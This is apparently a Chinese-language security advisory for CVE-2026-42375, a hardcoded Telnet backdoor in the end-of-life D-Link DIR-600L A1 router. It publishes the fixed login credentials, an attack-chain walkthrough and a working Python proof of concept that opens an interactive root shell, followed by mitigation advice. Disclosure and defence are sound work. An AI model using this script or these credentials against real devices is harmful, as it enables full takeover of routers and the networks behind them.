CVE-2026-42375 CVSS 9.8 严重

CVE-2026-42375 D-Link DIR-600L 硬编码Telnet后门漏洞

披露日期: 2026-05-04

来源: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

漏洞信息

漏洞编号

CVE-2026-42375

漏洞类型

硬编码凭据

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-600L

漏洞概述

D-Link DIR-600L硬件版本A1存在严重的硬编码Telnet后门漏洞。由于该设备已终止生命周期（EOL），官方将不再提供安全补丁。漏洞源于设备启动脚本`/bin/telnetd.sh`自动开启Telnet守护进程，并预设了硬编码的凭证。攻击者只需接入同一局域网，即可利用这些默认凭证登录，无需任何身份验证即可获得Root Shell，进而完全接管设备的控制权，造成极高的安全风险。

技术细节

该漏洞的根本原因在于D-Link DIR-600L A1固件中集成了硬编码的后门凭证。设备启动时，初始化脚本`/bin/telnetd.sh`会自动启动定制的`telnetd`二进制文件。该二进制文件接受`-u user:password`参数，其中用户名固定为“Alphanetworks”，密码为存储在`/etc/alpha_config/image_sign`文件中的静态字符串“wrgn35_dlwbr_dir600l”。身份验证由定制的`login`程序执行，它使用`strcmp()`函数直接比对用户输入与硬编码字符串。由于Telnet服务默认在局域网内开启，且没有防火墙限制本地访问，攻击者只需在局域网内扫描端口23，尝试利用上述凭证即可绕过所有安全机制。一旦认证成功，攻击者将获得Root权限的Shell，能够执行任意系统命令，篡改路由器配置，窃听网络流量或将其作为跳板攻击内网其他设备。

攻击链分析

STEP 1

侦察

攻击者扫描本地网络以识别D-Link DIR-600L设备，并检测开放在TCP 23端口的Telnet服务。

STEP 2

利用

攻击者使用Python脚本或Telnet客户端连接到目标设备，并输入硬编码的用户名Alphanetworks和密码wrgn35_dlwbr_dir600l。

STEP 3

认证绕过

设备后端的strcmp()函数将输入的凭证与固件中的硬编码字符串比对，由于匹配成功，认证被绕过。

STEP 4

执行

攻击者获得Root权限的Shell访问权，可以执行任意系统命令，完全控制路由器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import telnetlib
import sys

# Target IP address of the vulnerable device
TARGET_IP = "192.168.0.1"
TARGET_PORT = 23

# Hardcoded credentials extracted from firmware
USERNAME = "Alphanetworks"
PASSWORD = "wrgn35_dlwbr_dir600l"

def exploit():
    try:
        print(f"[*] Attempting to connect to {TARGET_IP} on port {TARGET_PORT}...")
        # Establish a Telnet connection
        tn = telnetlib.Telnet(TARGET_IP, TARGET_PORT, timeout=10)
        
        print("[*] Connection established. Waiting for login prompt...")
        
        # Wait for the login prompt (likely 'login: ')
        tn.read_until(b"login: ", timeout=5)
        tn.write(USERNAME.encode('ascii') + b"\n")
        
        # Wait for the password prompt (likely 'Password: ')
        tn.read_until(b"Password: ", timeout=5)
        tn.write(PASSWORD.encode('ascii') + b"\n")
        
        print("[*] Credentials sent. Checking for shell access...")
        
        # Interact with the shell to verify root access
        tn.write(b"id\n")
        response = tn.read_until(b"uid=0(root)", timeout=5)
        
        if b"uid=0(root)" in response:
            print("[+] SUCCESS! Root shell obtained.")
            print("[+] Dropping into interactive shell...")
            tn.interact()
        else:
            print("[-] Failed to obtain root shell. Credentials might be incorrect or patched.")
            tn.close()
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    exploit()

影响范围

D-Link DIR-600L Hardware Revision A1

防御指南

临时缓解措施

鉴于该设备已达到生命周期结束（EOL）且不会收到补丁，最有效的缓解措施是在网络边界防火墙上阻止对端口23（Telnet）的访问，或将设备隔离在受限制的VLAN中。最终解决方案是更换设备。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表